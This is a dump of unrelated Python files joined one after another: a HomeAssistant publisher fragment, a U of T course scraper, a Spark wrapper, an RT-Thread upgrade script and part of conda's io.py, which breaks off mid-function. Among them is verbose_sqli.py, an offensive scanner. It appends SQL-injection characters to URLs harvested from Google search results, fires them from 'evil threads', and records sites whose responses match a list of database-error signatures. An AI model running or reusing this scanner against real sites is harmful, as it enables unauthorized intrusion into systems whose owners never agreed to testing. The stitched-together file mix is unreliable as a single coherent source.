except self.requests.exceptions.ReadTimeout as e:
logger.log(
logging.INFO4,
"Error connecting to HomeAssistant to publish sensor values",
)
logger.debug(str(e))
self.settingRetryRate(msg)
return False
except Exception as e:
logger.log(
logging.INFO4, "Error during publishing HomeAssistant sensor values"
)
logger.debug(str(e))
self.settingRetryRate(msg)
return False
def settingRetryRate(self, msg):
# Setting elapsing time to now + retryRateInSeconds
self.msgQueue[msg.sensor].elapsingTime = (
self.time.time() + self.retryRateInSeconds
)
class HASSMessage:
    """Container for one queued HomeAssistant sensor update."""

    # Class-level defaults mirroring the constructor parameters.
    elapsingTime = 0
    sensor = ""
    twcid = ""
    key_underscore = ""
    key_camelcase = ""
    value = None
    unit = ""

    def __init__(
        self, elapsingTime, sensor, twcid, key_underscore, key_camelcase, value, unit
    ):
        # Copy every argument verbatim onto the instance.
        (
            self.elapsingTime,
            self.sensor,
            self.twcid,
            self.key_underscore,
            self.key_camelcase,
            self.value,
            self.unit,
        ) = (elapsingTime, sensor, twcid, key_underscore, key_camelcase, value, unit)
|
courses.py | import re
from collections import OrderedDict
from datetime import datetime
from threading import Thread
import requests
from bs4 import BeautifulSoup
from data_parser.base_parser import BaseParser
from validations.schemas.courses_schema import CoursesSchema
class CoursesParser(BaseParser):
    """Scrapes every course page from the U of T Course Finder into courses.json.

    Workflow: fill_queue() seeds the work queue with one URL per course,
    process() is run by worker threads to fetch and parse pages, and
    clean_up() moves the parsed records into the output dataset.
    """

    link = "https://coursefinder.utoronto.ca/course-search/search"

    def __init__(self):
        super().__init__(
            file="../nikel-datasets/data/courses.json",
            schema=CoursesSchema
        )

    def fill_queue(self):
        """Seed the work queue with the URL of every discoverable course."""
        for course_link in self.extract_courses_links():
            self.queue.put(course_link)

    @staticmethod
    def _fetch(link):
        """GET *link*, retrying on transient network errors.

        The previous implementation retried on a bare ``except`` with no
        delay, which busy-spun forever on a persistent outage and also
        swallowed KeyboardInterrupt; only requests' own network errors are
        retried now, with a short pause between attempts.
        """
        from time import sleep
        while True:
            try:
                return requests.get(link)
            except requests.exceptions.RequestException:
                sleep(1)

    def process(self):
        """Worker loop: fetch and parse queued course pages.

        Parsed courses are accumulated locally and pushed onto
        ``self.result_queue`` once this worker sees an empty queue.
        """
        courses = []
        while not self.queue.empty():
            link = self.queue.get()
            self.thread_print(f"{self.queue.qsize()} Left: {link}")
            page = self._fetch(link)
            parsed_page = BeautifulSoup(page.content, "lxml")
            inner_page = parsed_page.find("div", id="correctPage")
            if inner_page is None:
                # Course Finder served an error/redirect page; skip it.
                self.queue.task_done()
                continue
            # Title is rendered as "<code>: <name>".
            title = inner_page.find(
                "span", {"class": "uif-headerText-span"}).text
            title_parse = re.search(r"(.*?): (.*)", title)
            sections = self._parse_meeting_sections(
                inner_page.find("table", id="u172"))
            # The "uNNN" ids below are the fixed span ids of the Course
            # Finder detail page fields.
            courses.append(OrderedDict([
                ("id", link.rsplit('/', 1)[-1]),
                ("code", title_parse.group(1)),
                ("name", title_parse.group(2)),
                ("description", self.process_field(inner_page, "u32")),
                ("division", self.process_field(inner_page, "u23")),
                ("department", self.process_field(inner_page, "u41")),
                ("prerequisites", self.process_field(inner_page, "u50")),
                ("corequisites", self.process_field(inner_page, "u59")),
                ("exclusions", self.process_field(inner_page, "u68")),
                ("recommended_preparation", self.process_field(inner_page, "u77")),
                ("level", self.process_field(inner_page, "u86")),
                ("campus", self.process_field(inner_page, "u149")),
                ("term", self.process_field(inner_page, "u158")),
                ("arts_and_science_breadth", self.process_field(inner_page, "u122")),
                ("arts_and_science_distribution",
                 self.process_field(inner_page, "u131")),
                ("utm_distribution", self.process_field(inner_page, "u113")),
                ("utsc_breadth", self.process_field(inner_page, "u104")),
                ("apsc_electives", self.process_field(inner_page, "u140")),
                ("meeting_sections", sections),
                ("last_updated", datetime.now().isoformat()),
            ]))
            self.queue.task_done()
        self.result_queue.put(courses)

    @staticmethod
    def _parse_meeting_sections(meeting_table):
        """Parse the meeting-section table into a list of section dicts.

        Adapted from cobalt's scraper; tolerant of missing columns.
        """
        sections = []
        rows = meeting_table.find_all("tr") if meeting_table else []
        for row in rows:
            tds = row.find_all("td")
            if not tds:
                continue
            meeting_code = tds[0].text.strip()
            # Times come as space-separated "DAY HH:MM-HH:MM" pairs.
            raw_times = tds[1].get_text().replace(
                "Alternate week", "").strip().split(" ")
            times = []
            for j in range(0, len(raw_times) - 1, 2):
                times.append(raw_times[j] + " " + raw_times[j + 1])
            instructors = BeautifulSoup(
                str(tds[2]).replace("<br>", "\n"), "lxml")
            instructors = instructors.get_text().split("\n")
            instructors = list(
                filter(None, [x.strip() for x in instructors]))
            raw_locations = tds[3].get_text().strip().split(" ")
            locations = []
            for j in range(0, len(raw_locations) - 1, 2):
                locations.append(
                    raw_locations[j] + " " + raw_locations[j + 1])
            # Optional columns: missing/garbled values become None.
            # (bare "except:" replaced so KeyboardInterrupt is not eaten)
            try:
                class_size = int(tds[4].get_text().strip())
            except Exception:
                class_size = None
            try:
                current_enrollment = int(tds[5].get_text().strip())
            except Exception:
                current_enrollment = None
            try:
                option_to_waitlist = tds[6].find("img", {
                    "src": "../courseSearch/images/checkmark.png"}) is not None
            except Exception:
                option_to_waitlist = None
            try:
                delivery_mode = tds[7].text.strip().lower()
            except Exception:
                delivery_mode = None
            time_data = []
            for idx, time_slot in enumerate(times):
                info = time_slot.split(" ")
                day = info[0].lower()
                hours = info[1].split("-")
                try:
                    location = locations[idx]
                except IndexError:
                    location = None
                # Convert "HH:MM" endpoints to seconds since midnight.
                for k in range(len(hours)):
                    parts = hours[k].split(':')
                    hours[k] = (60 * 60 * int(parts[0])) + (int(parts[1]) * 60)
                time_data.append(OrderedDict([
                    ("day", day),
                    ("start", hours[0]),
                    ("end", hours[1]),
                    ("duration", hours[1] - hours[0]),
                    ("location", location)
                ]))
            sections.append(OrderedDict([
                ("code", meeting_code),
                ("instructors", instructors),
                ("times", time_data),
                ("size", class_size),
                ("enrollment", current_enrollment),
                ("waitlist_option", option_to_waitlist),
                ("delivery", delivery_mode)
            ]))
        return sections

    def clean_up(self):
        """Move every parsed course from the result queue into the dataset."""
        while not self.result_queue.empty():
            for course in self.result_queue.get():
                self.add_item(course)

    @staticmethod
    def process_field(page, id: str):
        """Return the stripped text of span *id*, or None if absent/empty."""
        field = page.find("span", id=id)
        if field:
            field = field.text.strip()
        if not field:
            field = None
        return field

    def extract_courses_links(self):
        """Return the detail-page URL of every course from the search API."""
        courses = []
        sess = requests.Session()
        # set cookies
        sess.get(
            f"{CoursesParser.link}/courseSearch?viewId=CourseSearch-FormView&methodToCall=start#search")
        resp = sess.get(
            f"{CoursesParser.link}/courseSearch/course/search"
            f"?queryText=&requirements=&campusParam=St.%20George,Scarborough,Mississauga"
        ).json()
        for course in resp["aaData"]:
            link = BeautifulSoup(course[1], 'html.parser')
            courses.append(f'{CoursesParser.link}/{link.find("a")["href"]}')
        return courses
if __name__ == "__main__":
    # Standalone entry point: scrape all courses with a pool of worker
    # threads, then validate the dumped JSON against the schema.
    p = CoursesParser()
    p.load_file()
    p.fill_queue()
    # p.threads workers drain the shared queue concurrently.
    for i in range(p.threads):
        t = Thread(target=p.process, args=())
        t.start()
    p.queue.join()
    p.clean_up()
    p.dump_file()
    p.thread_print(f"Validating {p.file}...")
    p.validate_dump()
|
spark.py | import threading
from pyspark import SparkContext
from pyspark.streaming import StreamingContext
from src.putils import pretty_print
class Spark:
    """Wrapper around a SparkContext plus a 1-second StreamingContext
    used to run SIFT save/filter/count jobs over a text-file stream."""
    def __init__(self):
        self.sc = SparkContext(appName="SparkSIFTCounter")
        self.sc.setLogLevel('ERROR')
        # 1-second micro-batches; checkpoint dir is required by windowed ops.
        self.streaming_sc = StreamingContext(self.sc, 1)
        self.streaming_sc.checkpoint('checkpoint')
    def create(self, stream_dir, converter, function, sift, log=None):
        """Build the streaming pipeline and start it on a daemon thread.

        function selects the per-record aggregation ('save'/'filter'/'count');
        anything else falls back to sift.save.  Results go to *log* via
        saveAsTextFiles.
        """
        images = self.streaming_sc.textFileStream(stream_dir)
        aggr = sift.save
        if function == 'save':
            aggr = sift.save
        if function == 'filter':
            aggr = sift.filter
        if function == 'count':
            aggr = sift.count
        stream = images.map(converter).map(aggr)
        if function == 'count':
            def avg(x, y):
                return (x + y) / 2
            # NOTE(review): (x - y) is not a true inverse of avg, so the
            # 30s/3s windowed reduction may not produce the intended values
            # as records leave the window -- verify.
            stream = stream.reduceByKeyAndWindow(avg, lambda x, y: x - y, 30,
                                                 3)
        pretty_print(stream)
        stream.saveAsTextFiles(log)
        # Start/await the streaming context off-thread so create() returns.
        thread = threading.Thread(target=Spark.pending, args=(self, ))
        thread.daemon = True
        thread.start()
    def pending(self):
        # Blocks until the streaming context terminates.
        self.streaming_sc.start()
        self.streaming_sc.awaitTermination()
|
verbose_sqli.py | import os
import re
from queue import Queue
from urllib.parse import urlparse
from threading import Thread
import requests
import threading
from requests import get
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
# Shared lock for synchronising worker output (currently unused by workers).
lock = threading.Lock()

# Signatures of verbose database/server error messages whose presence in a
# response suggests an injectable parameter.  Every pattern is compiled
# case-insensitively below; order is irrelevant.
ERRORS = [
    r'\[(ODBC SQL Server Driver|SQL Server)\]',
    r'mysql_fetch_assoc',
    r'You have an error in your SQL syntax;',
    r'A syntax error has occurred',
    r'ADODB.Field error',
    r'ASP.NET is configured to show verbose error messages',
    r'ASP.NET_SessionId',
    r'Active Server Pages error',
    r'An illegal character has been found in the statement',
    r'An unexpected token "END-OF-STATEMENT" was found',
    r'CLI Driver',
    r'Can\'t connect to local',
    r'Custom Error Message',
    r'DB2 Driver',
    r'DB2 Error',
    r'DB2 ODBC',
    r'Died at',
    r'Disallowed Parent Path',
    r'Error Diagnostic Information',
    r'Error Message : Error loading required libraries.',
    r'Error Report',
    r'Error converting data type varchar to numeric',
    r'Incorrect syntax near',
    r'Invalid procedure call or argument',
    r'Invision Power Board Database Error',
    r'JDBC Driver',
    r'JDBC Error',
    r'JDBC MySQL',
    r'JDBC Oracle',
    r'JDBC SQL',
    r'Microsoft OLE DB Provider for ODBC Drivers',
    r'Microsoft VBScript compilation error',
    r'Microsoft VBScript error',
    r'MySQL Driver',
    r'MySQL Error',
    r'MySQL ODBC',
    r'ODBC DB2',
    r'ODBC Driver',
    r'ODBC Error',
    r'ODBC Microsoft Access',
    r'ODBC Oracle',
    r'ODBC SQL',
    r'ODBC SQL Server',
    r'OLE/DB provider returned message',
    r'ORA-0',
    r'ORA-1',
    r'Oracle DB2',
    r'Oracle Driver',
    r'Oracle Error',
    r'Oracle ODBC',
    r'PHP Error',
    r'PHP Parse error',
    r'PHP Warning',
    r'Parent Directory',
    r'Permission denied: \'GetObject\'',
    r'PostgreSQL query failed: ERROR: parser: parse error',
    r'SQL Server Driver\]\[SQL Server',
    r'SQL command not properly ended',
    r'SQLException',
    r'Supplied argument is not a valid PostgreSQL result',
    r'Syntax error in query expression',
    r'The error occurred in',
    r'The script whose uid is',
    r'Type mismatch',
    r'Unable to jump to row',
    r'Unclosed quotation mark before the character string',
    r'Unterminated string constant',
    r'Warning: Cannot modify header information - headers already sent',
    r'Warning: Supplied argument is not a valid File-Handle resource in',
    r'Warning: mysql_query()',
    r'Warning: pg_connect(): Unable to connect to PostgreSQL server: FATAL',
    r'You have an error in your SQL syntax near',
    r'data source=',
    r'detected an internal error \[IBM\]\[CLI Driver\]\[DB2/6000\]',
    r'include_path',
    r'invalid query',
    r'is not allowed to access',
    r'missing expression',
    r'mySQL error with query',
    r'mysql error',
    r'on MySQL result index',
    r'supplied argument is not a valid MySQL result resource',
    r'unexpected end of SQL command',
]
# Pre-compiled once at import time so the scan workers only pay for search().
ERROR_RGX = [re.compile(error, re.IGNORECASE) for error in ERRORS]
class Sqli_Finder():
    """Scans a file of URLs for verbose SQL-injection error disclosure.

    Instantiating the class immediately runs the scan (sqli_f); hits are
    appended to sqli_sites.txt.
    """

    def __init__(self, filename):
        self.filename = filename
        self.urls = self.sqli_f()

    @staticmethod
    def banner():
        os.system('clear')
        print("\n")
        print(" █████╗ ███╗ ██╗ █████╗ ██████╗ ██████╗ ██████╗ ██████╗ ███████╗██████╗ ")
        print("██╔══██╗████╗ ██║██╔══██╗██╔══██╗██╔════╝██╔═══██╗██╔══██╗██╔════╝██╔══██╗")
        print("███████║██╔██╗ ██║███████║██████╔╝██║ ██║ ██║██║ ██║█████╗ ██████╔╝")
        print("██╔══██║██║╚██╗██║██╔══██║██╔══██╗██║ ██║ ██║██║ ██║██╔══╝ ██╔══██╗")
        print("██║ ██║██║ ╚████║██║ ██║██║ ██║╚██████╗╚██████╔╝██████╔╝███████╗██║ ██║")
        print("╚═╝ ╚═╝╚═╝ ╚═══╝╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝ ╚═════╝ ╚═════╝ ╚══════╝╚═╝ ╚═╝")
        print(" Verbose SQLi Plugin - anarcoder at protonmail.com\n")

    def remove_duplicate_targets(self):
        """Read target URLs from the input file, keeping one query per path."""
        # BUG FIX: the file handle was opened without ever being closed;
        # use a context manager.
        with open(self.filename) as fh:
            results = [line.rstrip('\n') for line in fh]
        url_lists = []
        path_list = []
        for url in results:
            try:
                urlp = urlparse(url)
                path = urlp.scheme + '://' + urlp.netloc + urlp.path
                if path not in path_list:
                    urlp = urlp.scheme + '://' + urlp.netloc + urlp.path + '?' + urlp.query
                    url_lists.append(urlp)
                    path_list.append(path)
            except Exception:
                pass
        return list(set(url_lists))

    def insert_payloads(self, url_list):
        """Return one URL per (query parameter, payload) combination.

        Each payload character is appended directly after the parameter it
        targets, e.g. ?q=1 -> ?q=1' .
        """
        ret_list = []
        payloads = ["'", "\\", ";"]
        try:
            for url in url_list:
                urlq = urlparse(url)
                for par in urlq.query.split("&"):
                    for pay in payloads:
                        ret_list.append(url.replace(par, par + pay))
        except Exception:
            pass
        return ret_list

    def check_vuln(self, q):
        """Worker: probe URLs from *q*, logging ones exposing verbose errors.

        BUG FIX: the original called q.task_done() twice per item on
        exceptions, which eventually raised ValueError inside the worker and
        unbalanced q.join(); task_done() now runs exactly once per item.
        """
        # Request headers are loop-invariant; build them once.
        headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; '
                                 'Linux x86_64; rv:41.0) Gecko/20100101 '
                                 'Firefox/41.0'}
        while True:
            url = q.get()
            try:
                req = get(url, headers=headers, verify=False, timeout=25)
                # Decode once instead of once per regex.
                body = req.content.decode('latin-1')
                with open('sqli_sites.txt', 'a+') as f:
                    for error in ERROR_RGX:
                        if error.search(body):
                            f.write(url + '\n')
                            print('[+] {0} \033[31mPossible Vulnerable!!\033[33m error exposed..\033[39m'.format(url))
            except Exception:
                # Best-effort probe: network/parse failures are skipped,
                # matching the original behaviour.
                pass
            finally:
                q.task_done()

    def sqli_f(self):
        """Build payload URLs from the target file and scan with a thread pool."""
        self.banner()
        # Removing duplicate targets
        url_lists = self.remove_duplicate_targets()
        pay_list = self.insert_payloads(url_lists)
        print(len(pay_list))
        # My Queue
        q = Queue(maxsize=0)
        # Number of threads
        num_threads = 10
        for url in pay_list:
            q.put(url)
        # My threads
        print('[+] Trying targets.. possible vulnerable will be saved in sqli_sites.txt.. ')
        print('[*] Starting evil threads =)...\n')
        for i in range(num_threads):
            worker = Thread(target=self.check_vuln, args=(q,))
            worker.daemon = True  # setDaemon() is deprecated
            worker.start()
        q.join()
def main():
    """Entry point: scan the Google-search results file for verbose SQLi."""
    Sqli_Finder(filename='results_google_search.txt')
if __name__ == '__main__':
    # Allow running this plugin directly as a script.
    main()
|
init_env.py | # -*- coding:utf-8 -*-
#
# File : env.py
# This file is part of RT-Thread RTOS
# COPYRIGHT (C) 2006 - 2019, RT-Thread Development Team
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# Change Logs:
# Date Author Notes
# 2019-8-26 SummerGift first version
#
from multiprocessing import Process
import os
import sys
def run_proc(name, env_root):
    """Run the env tool's "package --upgrade" step, logging under *env_root*.

    Args:
        name: Task label (not used by the command itself).
        env_root: Root directory of the env tool installation (Windows-style
            relative script path, hence the backslashes).
    """
    exec_file = os.path.join(env_root, "tools\scripts\env.py")
    log_std = os.path.join(env_root, "env_log_std")
    log_err = os.path.join(env_root, "env_log_err")
    try:
        # os.system returns the command's exit status; it does not raise on
        # command failure, so the failure branch below checks the status.
        ret = os.system("python {0} package --upgrade 1>{1} 2>{2}".format(exec_file, log_std, log_err))
    except Exception:
        ret = -1
    if ret != 0:
        print("Auto upgrade failed, please check your network.")
        # BUG FIX: was sys.eixt(1), an AttributeError typo.
        sys.exit(1)
def main():
    """Spawn a child process that performs the env package upgrade, and wait."""
    env_root = os.getenv("ENV_ROOT")
    worker = Process(target=run_proc, args=('upgrade', env_root))
    worker.start()
    worker.join()
if __name__=='__main__':
    # Script entry point (also required on Windows for multiprocessing).
    main()
|
io.py | # -*- coding: utf-8 -*-
# Copyright (C) 2012 Anaconda, Inc
# SPDX-License-Identifier: BSD-3-Clause
from __future__ import absolute_import, division, print_function, unicode_literals
from collections import defaultdict
from concurrent.futures import ProcessPoolExecutor, ThreadPoolExecutor, Executor, Future, _base, as_completed # NOQA
from concurrent.futures.thread import _WorkItem
from contextlib import contextmanager
from enum import Enum
from errno import EPIPE, ESHUTDOWN
from functools import partial, wraps
import sys
if sys.version_info[0] > 2:
# Not used at present.
from io import BytesIO
from itertools import cycle
import json
import logging # lgtm [py/import-and-import-from]
from logging import CRITICAL, Formatter, NOTSET, StreamHandler, WARN, getLogger
import os
from os.path import dirname, isdir, isfile, join
import signal
from threading import Event, Thread, Lock
from time import sleep, time
from .compat import StringIO, iteritems, on_win, encode_environment
from .constants import NULL
from .path import expand
from .._vendor.auxlib.decorators import memoizemethod
from .._vendor.auxlib.logz import NullHandler
from .._vendor.auxlib.type_coercion import boolify
from .._vendor.tqdm import tqdm
log = getLogger(__name__)
class DeltaSecondsFormatter(Formatter):
    """
    Logging formatter with additional attributes for run time logging.

    Attributes:
      `delta_secs`:
          Elapsed seconds since last log/format call (or creation of logger).
      `relative_created_secs`:
          Like `relativeCreated`, time relative to the initialization of the
          `logging` module but conveniently scaled to seconds as a `float` value.
    """

    def __init__(self, fmt=None, datefmt=None):
        super(DeltaSecondsFormatter, self).__init__(fmt=fmt, datefmt=datefmt)
        # Timestamp of the previous format() call (or of construction).
        self.prev_time = time()

    def format(self, record):
        now = time()
        # Seconds elapsed since the previous record was formatted.
        record.delta_secs = now - self.prev_time
        # max() guards against the clock moving backwards between calls.
        self.prev_time = max(self.prev_time, now)
        record.relative_created_secs = record.relativeCreated / 1000
        return super(DeltaSecondsFormatter, self).format(record)
# Module-wide formatter: CONDA_TIMED_LOGGING opts in to extra elapsed-time
# columns via DeltaSecondsFormatter; otherwise use the plain format.
if boolify(os.environ.get('CONDA_TIMED_LOGGING')):
    _FORMATTER = DeltaSecondsFormatter(
        "%(relative_created_secs) 7.2f %(delta_secs) 7.2f "
        "%(levelname)s %(name)s:%(funcName)s(%(lineno)d): %(message)s"
    )
else:
    _FORMATTER = Formatter(
        "%(levelname)s %(name)s:%(funcName)s(%(lineno)d): %(message)s"
    )
def dashlist(iterable, indent=2):
    """Render *iterable* as an indented dashed list, one "- item" per line,
    each line preceded by a newline."""
    prefix = '\n' + ' ' * indent + '- '
    return ''.join(prefix + str(item) for item in iterable)
class ContextDecorator(object):
    """Base class for a context manager class (implementing __enter__() and __exit__()) that also
    makes it a decorator.
    """
    # TODO: figure out how to improve this pattern so e.g. swallow_broken_pipe doesn't have to be instantiated # NOQA

    def __call__(self, f):
        @wraps(f)
        def wrapper(*args, **kwargs):
            # Run the wrapped callable inside this instance's context.
            with self:
                return f(*args, **kwargs)

        return wrapper
class SwallowBrokenPipe(ContextDecorator):
    """Swallow EPIPE/ESHUTDOWN OSErrors caused by stdout or stderr being
    closed by a downstream program; every other exception propagates."""

    def __enter__(self):
        pass

    def __exit__(self, exc_type, exc_val, exc_tb):
        # EnvironmentError is an alias of OSError on Python 3.
        if not isinstance(exc_val, EnvironmentError):
            return None
        if getattr(exc_val, 'errno', None) in (EPIPE, ESHUTDOWN):
            return True


swallow_broken_pipe = SwallowBrokenPipe()
class CaptureTarget(Enum):
    """Constants used for contextmanager captured.
    Used similarly like the constants PIPE, STDOUT for stdlib's subprocess.Popen.
    """
    # Capture the stream into an in-memory string.
    STRING = -1
    # For stderr only: redirect into whatever stdout is captured to.
    STDOUT = -2
@contextmanager
def env_vars(var_map=None, callback=None, stack_callback=None):
    """Temporarily apply *var_map* to os.environ, restoring prior state on exit.

    *callback* fires after the variables are set and again after they are
    restored; *stack_callback* additionally receives True on entry and
    False on exit.
    """
    new_var_map = encode_environment(var_map if var_map is not None else {})
    saved_vars = {}
    for name, value in iteritems(new_var_map):
        # NULL is the sentinel for "was not set at all".
        saved_vars[name] = os.environ.get(name, NULL)
        os.environ[name] = value
    try:
        if callback:
            callback()
        if stack_callback:
            stack_callback(True)
        yield
    finally:
        for name, original in iteritems(saved_vars):
            if original is NULL:
                del os.environ[name]
            else:
                os.environ[name] = original
        if callback:
            callback()
        if stack_callback:
            stack_callback(False)
@contextmanager
def env_var(name, value, callback=None, stack_callback=None):
    """Temporarily set a single environment variable via env_vars()."""
    # Maybe, but in env_vars, not here:
    # from conda.compat import ensure_fs_path_encoding
    # d = dict({name: ensure_fs_path_encoding(value)})
    d = {name: value}
    with env_vars(d, callback=callback, stack_callback=stack_callback) as es:
        yield es
@contextmanager
def env_unmodified(callback=None):
    """Fire the env_vars() callback hooks without changing any variables."""
    with env_vars(callback=callback) as es:
        yield es
@contextmanager
def captured(stdout=CaptureTarget.STRING, stderr=CaptureTarget.STRING):
    """Capture outputs of sys.stdout and sys.stderr.

    If stdout is STRING, capture sys.stdout as a string,
    if stdout is None, do not capture sys.stdout, leaving it untouched,
    otherwise redirect sys.stdout to the file-like object given by stdout.

    Behave correspondingly for stderr with the exception that if stderr is STDOUT,
    redirect sys.stderr to stdout target and set stderr attribute of yielded object to None.

    Args:
        stdout: capture target for sys.stdout, one of STRING, None, or file-like object
        stderr: capture target for sys.stderr, one of STRING, STDOUT, None, or file-like object

    Yields:
        CapturedText: has attributes stdout, stderr which are either strings, None or the
            corresponding file-like function argument.
    """
    # NOTE: This function is not thread-safe. Using within multi-threading may cause spurious
    # behavior of not returning sys.stdout and sys.stderr back to their 'proper' state
    # """
    # Context manager to capture the printed output of the code in the with block
    #
    # Bind the context manager to a variable using `as` and the result will be
    # in the stdout property.
    #
    # >>> from conda.common.io import captured
    # >>> with captured() as c:
    # ...     print('hello world!')
    # ...
    # >>> c.stdout
    # 'hello world!\n'
    # """
    # Monkey-patched onto the capture buffer below; normalises writes of
    # bytes vs. text to the buffer's expected type.
    def write_wrapper(self, to_write):
        # This may have to deal with a *lot* of text.
        if hasattr(self, 'mode') and 'b' in self.mode:
            wanted = bytes
        elif sys.version_info[0] == 3 and isinstance(self, BytesIO):
            wanted = bytes
        else:
            # ignore flake8 on this because it finds an error on py3 even though it is guarded
            if sys.version_info[0] == 2:
                wanted = unicode # NOQA
            else:
                wanted = str
        if not isinstance(to_write, wanted):
            if hasattr(to_write, 'decode'):
                decoded = to_write.decode('utf-8')
                self.old_write(decoded)
            elif hasattr(to_write, 'encode'):
                b = to_write.encode('utf-8')
                self.old_write(b)
            else:
                # NOTE(review): with this alignment, a write whose type
                # already matches `wanted` is silently dropped (upstream
                # conda pairs this else with the outer isinstance check)
                # -- verify the intended indentation.
                self.old_write(to_write)
    # Result holder; stdout/stderr attributes are attached in finally.
    class CapturedText(object):
        pass
    # sys.stdout.write(u'unicode out')
    # sys.stdout.write(bytes('bytes out', encoding='utf-8'))
    # sys.stdout.write(str('str out'))
    saved_stdout, saved_stderr = sys.stdout, sys.stderr
    if stdout == CaptureTarget.STRING:
        outfile = StringIO()
        outfile.old_write = outfile.write
        outfile.write = partial(write_wrapper, outfile)
        sys.stdout = outfile
    else:
        outfile = stdout
        if outfile is not None:
            sys.stdout = outfile
    if stderr == CaptureTarget.STRING:
        errfile = StringIO()
        errfile.old_write = errfile.write
        errfile.write = partial(write_wrapper, errfile)
        sys.stderr = errfile
    elif stderr == CaptureTarget.STDOUT:
        sys.stderr = errfile = outfile
    else:
        errfile = stderr
        if errfile is not None:
            sys.stderr = errfile
    c = CapturedText()
    log.info("overtaking stderr and stdout")
    try:
        yield c
    finally:
        # Expose captured strings (or the raw targets) and restore streams.
        if stdout == CaptureTarget.STRING:
            c.stdout = outfile.getvalue()
        else:
            c.stdout = outfile
        if stderr == CaptureTarget.STRING:
            c.stderr = errfile.getvalue()
        elif stderr == CaptureTarget.STDOUT:
            c.stderr = None
        else:
            c.stderr = errfile
        sys.stdout, sys.stderr = saved_stdout, saved_stderr
        log.info("stderr and stdout yielding back")
@contextmanager
def argv(args_list):
    """Temporarily replace sys.argv with *args_list*."""
    previous = sys.argv
    sys.argv = args_list
    try:
        yield
    finally:
        sys.argv = previous
@contextmanager
def _logger_lock():
    # Hold the logging module's global lock while mutating logger state.
    # NOTE(review): relies on logging's private _acquireLock/_releaseLock
    # API (removed in newer CPython releases) -- verify against the
    # supported Python versions.
    logging._acquireLock()
    try:
        yield
    finally:
        logging._releaseLock()
@contextmanager
def disable_logger(logger_name):
    """Fully silence *logger_name* for the duration of the context, then
    restore its previous level/disabled/propagate state."""
    logr = getLogger(logger_name)
    saved_level, saved_disabled, saved_propagate = (
        logr.level, logr.disabled, logr.propagate)
    muted = NullHandler()
    with _logger_lock():
        logr.addHandler(muted)
        # One above CRITICAL: nothing can reach this threshold.
        logr.setLevel(CRITICAL + 1)
        logr.disabled, logr.propagate = True, False
    try:
        yield
    finally:
        with _logger_lock():
            logr.removeHandler(muted)  # restore list logr.handlers
            logr.level, logr.disabled = saved_level, saved_disabled
            logr.propagate = saved_propagate
@contextmanager
def stderr_log_level(level, logger_name=None):
    """Route *logger_name* exclusively to stderr at *level* inside the
    context, restoring its handlers/level/flags afterwards."""
    logr = getLogger(logger_name)
    saved = (logr.handlers, logr.level, logr.disabled, logr.propagate)
    handler = StreamHandler(sys.stderr)
    handler.name = 'stderr'
    handler.setLevel(level)
    handler.setFormatter(_FORMATTER)
    with _logger_lock():
        logr.setLevel(level)
        # Drop existing handlers and isolate the logger while active.
        logr.handlers, logr.disabled, logr.propagate = [], False, False
        logr.addHandler(handler)
        logr.setLevel(level)
    try:
        yield
    finally:
        with _logger_lock():
            logr.handlers, logr.level, logr.disabled, logr.propagate = saved
def attach_stderr_handler(level=WARN, logger_name=None, propagate=False, formatter=None):
    """Replace any existing handler named 'stderr' on *logger_name* with a
    fresh StreamHandler(sys.stderr), and set the logger's level/propagate."""
    logr = getLogger(logger_name)
    # Locate the previously-attached stderr handler, if any.
    old_stderr_handler = None
    for handler in logr.handlers:
        if handler.name == 'stderr':
            old_stderr_handler = handler
            break
    # Build its replacement; the handler itself filters nothing (NOTSET).
    new_stderr_handler = StreamHandler(sys.stderr)
    new_stderr_handler.name = 'stderr'
    new_stderr_handler.setLevel(NOTSET)
    new_stderr_handler.setFormatter(formatter if formatter is not None else _FORMATTER)
    # Swap atomically with respect to the logging machinery.
    with _logger_lock():
        if old_stderr_handler:
            logr.removeHandler(old_stderr_handler)
        logr.addHandler(new_stderr_handler)
        logr.setLevel(level)
        logr.propagate = propagate
def timeout(timeout_secs, func, *args, **kwargs):
    """Enforce a maximum time for a callable to complete.

    Not yet implemented on Windows.  Pass ``default_return=`` (popped from
    kwargs) to choose the value returned on timeout/interrupt.
    """
    default_return = kwargs.pop('default_return', None)
    if on_win:
        # No SIGALRM on Windows; run unguarded and only absorb Ctrl-C.
        try:
            return func(*args, **kwargs)
        except KeyboardInterrupt:  # pragma: no cover
            return default_return

    class TimeoutException(Exception):
        pass

    def interrupt(signum, frame):
        raise TimeoutException()

    signal.signal(signal.SIGALRM, interrupt)
    signal.alarm(timeout_secs)
    try:
        result = func(*args, **kwargs)
        # Cancel the pending alarm before returning normally.
        signal.alarm(0)
        return result
    except (TimeoutException, KeyboardInterrupt):  # pragma: no cover
        return default_return
class Spinner(object):
    """
    Terminal activity spinner driven by a background thread.

    Args:
        message (str):
            A message to prefix the spinner with. The string ': ' is automatically appended.
        enabled (bool):
            If False, usage is a no-op.
        json (bool):
            If True, will not output non-json to stdout.
    """
    # spinner_cycle = cycle("⠋⠙⠹⠸⠼⠴⠦⠧⠇⠏")
    spinner_cycle = cycle('/-\\|')
    def __init__(self, message, enabled=True, json=False):
        self.message = message
        self.enabled = enabled
        self.json = json
        self._stop_running = Event()
        self._spinner_thread = Thread(target=self._start_spinning)
        self._indicator_length = len(next(self.spinner_cycle)) + 1
        self.fh = sys.stdout
        # Animate only when enabled, non-json, and attached to a real TTY.
        self.show_spin = enabled and not json and hasattr(self.fh, "isatty") and self.fh.isatty()
    def start(self):
        # Non-TTY fallback: a single static "...working..." marker.
        if self.show_spin:
            self._spinner_thread.start()
        elif not self.json:
            self.fh.write("...working... ")
            self.fh.flush()
    def stop(self):
        if self.show_spin:
            self._stop_running.set()
            self._spinner_thread.join()
            self.show_spin = False
    def _start_spinning(self):
        # Runs on the spinner thread; backspaces over itself each frame.
        try:
            while not self._stop_running.is_set():
